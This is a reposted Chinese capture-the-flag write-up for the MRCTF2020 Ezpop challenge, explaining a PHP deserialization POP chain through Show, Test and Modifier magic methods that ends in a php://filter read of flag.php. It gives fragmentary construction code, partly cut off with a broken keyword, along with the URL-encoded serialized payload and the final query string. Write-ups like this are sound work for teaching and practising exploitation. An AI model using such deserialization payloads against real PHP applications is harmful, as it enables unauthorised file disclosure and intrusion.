脚本宝典收集整理的这篇文章主要介绍了[MRCTF2020]Ezpop反序列化POP链调用,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
https://buuoj wangt.cc /challenges#[MRCTf2020]Ezpop
Show类
看到有__toString方法,类被当成字符串时的回应方法
__wakeup方法,unserialize反序列化时优先调用
看test类
__get()方法,访问不存在的属性或是受限的属性时调用
pop链构造
- __wakeup()方法通过PReg_match()将$this->source做字符串比较,如果$this->source是Show类,就调用了__toString()方法
- __toString()访问了str的source属性,str可以构造成Test类,Test类不存在source属性,就调用了Test类的__get()方法
- __get()方法将p作为函数使用,p可以实例化成Modifier类,就调用了Modifier的__invoke()方法
- __invoke()方法调用了apPEnd()方法,包含$value,如果$value为伪协议,则可以读取flag.php
构造
source = $file;
}
}
class Test{
p
ublic $
p;
}
$a = new Show();
$a->str = new Test();
$a->str->p = new Modifier();
$b = new Show($a);
echo urlencode(serialize($b));
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00
VAR%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3
DFlag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
输出结果?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
脚本宝典总结
以上是脚本宝典为你收集整理的[MRCTF2020]Ezpop反序列化POP链调用全部内容,希望文章能够帮你解决[MRCTF2020]Ezpop反序列化POP链调用所遇到的问题。
如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。